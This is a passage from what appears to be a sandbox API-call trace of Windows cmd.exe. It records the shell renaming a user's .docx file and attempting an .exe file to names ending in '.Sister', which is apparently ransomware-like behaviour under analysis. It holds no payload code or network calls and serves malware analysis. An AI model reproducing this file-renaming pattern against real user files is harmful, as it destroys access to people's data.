hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3d) returned 1 [0303.833] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0303.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.834] GetFileType (hFile=0x50) returned 0x2 [0303.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.834] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0303.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.834] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0303.839] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0303.840] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0303.840] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0303.840] malloc (_Size=0xffce) returned 0x21eda100000 [0303.840] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.840] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0303.840] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0303.840] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0303.840] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0303.840] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0303.840] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0303.840] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0303.840] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0303.841] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0303.841] ??_V@YAXPEAX@Z () returned 0x1 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed937ee70 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ee70, Size=0x8c) returned 0x21ed937ee70 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ee70) returned 0x8c [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed8d44680 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8c7d160 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x8c) returned 0x21ed8c7d160 [0303.841] GetProcessHeap () returned 0x21ed8c70000 [0303.841] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x8c [0303.841] malloc (_Size=0xffce) returned 0x21eda100000 [0303.841] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.843] GetProcessHeap () returned 0x21ed8c70000 [0303.843] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cdc0 [0303.844] GetProcessHeap () returned 0x21ed8c70000 [0303.844] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d308e0 [0303.844] _wcsicmp (_String1="0H3WME_tqNVE6XV UFW.docx", _String2=".") returned 2 [0303.844] _wcsicmp (_String1="0H3WME_tqNVE6XV UFW.docx", _String2="..") returned 2 [0303.844] GetFileAttributesW (lpFileName="0H3WME_tqNVE6XV UFW.docx" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx")) returned 0x20 [0303.844] GetProcessHeap () returned 0x21ed8c70000 [0303.844] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cb7020 [0303.845] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cb7030 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.845] SetErrorMode (uMode=0x0) returned 0x0 [0303.846] SetErrorMode (uMode=0x1) returned 0x0 [0303.846] GetFullPathNameW (in: lpFileName="0H3WME_tqNVE6XV UFW.docx", nBufferLength=0x7fe7, lpBuffer=0x21eda100000, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx", lpFilePart=0xa6cf4fd660*="0H3WME_tqNVE6XV UFW.docx") returned 0x32 [0303.846] SetErrorMode (uMode=0x0) returned 0x1 [0303.846] GetProcessHeap () returned 0x21ed8c70000 [0303.846] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31780 [0303.846] _wcsicmp (_String1="0H3WME_tqNVE6XV UFW.docx", _String2=".") returned 2 [0303.846] _wcsicmp (_String1="0H3WME_tqNVE6XV UFW.docx", _String2="..") returned 2 [0303.846] GetFileAttributesW (lpFileName="0H3WME_tqNVE6XV UFW.docx" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx")) returned 0x20 [0303.846] ??_V@YAXPEAX@Z () returned 0x1 [0303.846] malloc (_Size=0xffce) returned 0x21eda100000 [0303.846] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.846] malloc (_Size=0xffce) returned 0x21eda10ffe0 [0303.846] ??_V@YAXPEAX@Z () returned 0x21eda10ffe0 [0303.846] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx")) returned 0x20 [0303.846] malloc (_Size=0xffce) returned 0x21ed993f900 [0303.847] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0303.847] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d308f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d308f0) returned 0x21ed8c7ca00 [0303.847] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0303.847] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0303.847] ??_V@YAXPEAX@Z () returned 0x1 [0303.847] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\0h3wme_tqnve6xv ufw.docx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0303.851] FindNextFileW (in: hFindFile=0x21ed8c7ca00, lpFindFileData=0x21ed8d308f0 | out: lpFindFileData=0x21ed8d308f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c20e9d0, ftCreationTime.dwHighDateTime=0x1d5dd58, ftLastAccessTime.dwLowDateTime=0x51e00a80, ftLastAccessTime.dwHighDateTime=0x1d5859b, ftLastWriteTime.dwLowDateTime=0x51e00a80, ftLastWriteTime.dwHighDateTime=0x1d5859b, nFileSizeHigh=0x0, nFileSizeLow=0xd540, dwReserved0=0x0, dwReserved1=0x0, cFileName="0H3WME_tqNVE6XV UFW.docx", cAlternateFileName="")) returned 0 [0303.853] GetLastError () returned 0x12 [0303.853] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0303.854] ??_V@YAXPEAX@Z () returned 0x1 [0303.854] ??_V@YAXPEAX@Z () returned 0x1 [0303.854] ??_V@YAXPEAX@Z () returned 0x1 [0303.855] ??_V@YAXPEAX@Z () returned 0x1 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce20 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95860, Size=0x16) returned 0x21ed8c95820 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95820) returned 0x16 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95b60, Size=0x20) returned 0x21ed8d45c20 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c20) returned 0x20 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b2a0 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b2a0, Size=0xb2) returned 0x21ed8c96700 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96700) returned 0xb2 [0303.855] GetProcessHeap () returned 0x21ed8c70000 [0303.855] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32d70 [0303.875] GetProcessHeap () returned 0x21ed8c70000 [0303.875] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32d70, Size=0x30) returned 0x21ed8d32d70 [0303.875] GetProcessHeap () returned 0x21ed8c70000 [0303.875] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32d70) returned 0x30 [0303.875] GetProcessHeap () returned 0x21ed8c70000 [0303.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32db0 [0303.876] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0303.876] GetProcessHeap () returned 0x21ed8c70000 [0303.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c95f80 [0303.876] GetProcessHeap () returned 0x21ed8c70000 [0303.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96400 [0303.876] ??_V@YAXPEAX@Z () returned 0x1 [0303.876] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0303.876] GetProcessHeap () returned 0x21ed8c70000 [0303.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96040 [0303.876] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda100000, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0303.876] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef70, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb20 [0303.877] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0303.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef70, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb20 [0303.877] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0303.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef70, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ca60 [0303.877] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0303.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef70, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0303.878] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.878] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0303.878] GetProcessHeap () returned 0x21ed8c70000 [0303.878] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67330 [0303.878] ??_V@YAXPEAX@Z () returned 0x1 [0303.878] ??_V@YAXPEAX@Z () returned 0x1 [0303.878] GetProcessHeap () returned 0x21ed8c70000 [0303.878] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32db0, Size=0x490) returned 0x21ed8d32db0 [0303.878] GetProcessHeap () returned 0x21ed8c70000 [0303.878] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32db0) returned 0x490 [0303.878] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0303.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.879] GetFileType (hFile=0x50) returned 0x2 [0303.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.879] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0303.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.880] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0303.887] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.887] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0303.887] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0303.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.887] GetFileType (hFile=0x50) returned 0x2 [0303.887] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.887] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0303.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.887] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0303.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.888] GetFileType (hFile=0x50) returned 0x2 [0303.888] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.888] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0303.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.889] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d32d80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d32d80*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0303.889] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0303.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.889] GetFileType (hFile=0x50) returned 0x2 [0303.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.889] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0303.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.890] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0303.897] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0303.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.897] GetFileType (hFile=0x50) returned 0x2 [0303.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.897] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0303.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.897] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0303.902] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0303.903] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0303.903] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0303.903] malloc (_Size=0xffce) returned 0x21eda100000 [0303.903] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.903] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0303.903] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0303.903] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0303.903] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0303.903] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0303.903] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0303.903] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0303.903] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0303.903] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0303.903] ??_V@YAXPEAX@Z () returned 0x1 [0303.903] GetProcessHeap () returned 0x21ed8c70000 [0303.903] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0303.904] GetProcessHeap () returned 0x21ed8c70000 [0303.904] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d62e50 [0303.904] GetProcessHeap () returned 0x21ed8c70000 [0303.904] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62e50) returned 0x130 [0303.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0303.904] malloc (_Size=0xffce) returned 0x21eda100000 [0303.904] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0303.904] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda100000, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0303.910] ??_V@YAXPEAX@Z () returned 0x1 [0303.910] GetProcessHeap () returned 0x21ed8c70000 [0303.910] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d626d0 [0303.910] GetProcessHeap () returned 0x21ed8c70000 [0303.910] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0303.911] GetProcessHeap () returned 0x21ed8c70000 [0303.911] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d62090 [0303.911] GetProcessHeap () returned 0x21ed8c70000 [0303.911] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62090) returned 0x130 [0303.911] malloc (_Size=0xffce) returned 0x21eda100000 [0303.911] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.911] GetProcessHeap () returned 0x21ed8c70000 [0303.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ca00 [0303.911] GetProcessHeap () returned 0x21ed8c70000 [0303.911] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d319f0 [0303.911] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0303.911] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0303.911] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0303.912] GetLastError () returned 0x2 [0303.912] GetProcessHeap () returned 0x21ed8c70000 [0303.912] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d45ef0 [0303.917] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d45f00 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.918] SetErrorMode (uMode=0x0) returned 0x0 [0303.918] SetErrorMode (uMode=0x1) returned 0x0 [0303.918] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda100000, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0303.918] SetErrorMode (uMode=0x0) returned 0x1 [0303.918] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0303.919] GetProcessHeap () returned 0x21ed8c70000 [0303.919] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30670 [0303.919] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0303.919] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0303.919] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0303.919] GetLastError () returned 0x2 [0303.919] ??_V@YAXPEAX@Z () returned 0x1 [0303.919] malloc (_Size=0xffce) returned 0x21eda100000 [0303.919] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.919] malloc (_Size=0xffce) returned 0x21eda10ffe0 [0303.919] ??_V@YAXPEAX@Z () returned 0x21eda10ffe0 [0303.919] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0303.920] GetLastError () returned 0x2 [0303.920] _get_osfhandle (_FileHandle=2) returned 0x54 [0303.920] GetFileType (hFile=0x54) returned 0x2 [0303.920] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0303.920] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0303.921] _get_osfhandle (_FileHandle=2) returned 0x54 [0303.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0303.921] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0303.921] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0303.921] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0303.929] longjmp () 